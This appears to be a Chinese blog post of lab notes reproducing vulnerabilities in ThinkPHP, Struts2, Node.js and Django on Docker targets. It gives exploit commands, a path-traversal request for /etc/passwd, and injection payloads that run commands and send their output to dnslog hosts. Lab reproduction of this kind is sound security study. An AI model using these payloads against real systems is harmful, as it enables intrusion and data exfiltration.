服务攻防-框架安全(漏洞复现)

关闭靶场

sudo docker-compose down

运行此靶场

sudo docker-compose up -d

查看启动环境

sudo docker ps

运行dockers容器

docker exec -it 64052abd288b /bin/bash

thinkphp框架

thinkphp 2 - rce漏洞复现

docker exec -it 731dbae0e0b5 /bin/bash

集成化工具扫描

可以命令执行

thinkphp/5.0.23-rce

集成化工具利用

thinkphp/5-rce

直接梭哈

thinkphp/in-sqlinjection

Struts2

S2-009

梭哈

struts2 命令执行 (CVE-2016-3081)

直接梭哈

061rce和nc

python3 struts2-061-poc.py http://123.58.224.8:64423 "ls /tmp"

python2 S2-061-shell.py http://123.58.224.8:64423

S2-062

python3 s2-062.py --url http://123.58.224.8:25807 --cmd whoami

靶场无回显

Node.js

目录穿越

GET /static/../../../a/../../../../etc/passwd HTTP/1.1

CVE-2021-21315

Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315

配合dnslog。Cn带外检测

/api/getServices?name[]=$(ping%20`ls%20/tmp`.5afckd.dnslog.cn)

Django

CVE-2019-14234

单引号已注入成功,SQL 语句报错:

/admin/vuln/collection/?detail__a%27b=123

创建 cmd_exec:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20

调用 cmd_exec 执行命令:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping 37p5oe.dmp4tj.dnslog.cn%27--%20

/shiro-721

shiro-cve_2016_4437

solr

相关推荐
大刘讲IT2 小时前
IT/OT 融合架构下的工业控制系统安全攻防实战研究
经验分享·安全·web安全·架构·制造
hao_wujing2 小时前
基于LLM的6G空天地一体化网络自进化安全框架
网络·安全
中杯可乐多加冰2 小时前
【解决方案】CloudFront VPC Origins 实践流程深入解析 —— 安全高效架构的实战之道
安全·架构·安全架构·vpc·cloudfront
码农飞哥2 小时前
互联网大厂Java面试实战:从Spring Boot到微服务的技术问答与解析
java·数据库·spring boot·安全·微服务·面试·电商
南暮思鸢4 小时前
应急响应基础模拟靶机-security2
linux·网络安全·write up·应急响应靶机
MarkHD4 小时前
第五天 车载系统安全(入侵检测、OTA安全) 数据加密(TLS/SSL、国密算法)
安全·车载系统·ssl
路baby4 小时前
2025第九届御网杯网络安全大赛线上赛 区域赛WP (MISC和Crypto)(详解-思路-脚本)
安全·web安全·网络安全·视频编解码·misc·crypto·御网杯
small_white_robot5 小时前
OSCP备战-kioptrixvm3详细解法
网络·安全·web安全
Lingxw_w8 小时前
【网络安全】——大端序(Big-Endian)和小端序(Little-Endian)
安全·web安全
小白学安全hhhh8 小时前
FlySecAgent:——MCP全自动AI Agent的实战利器
安全·ai·ai安全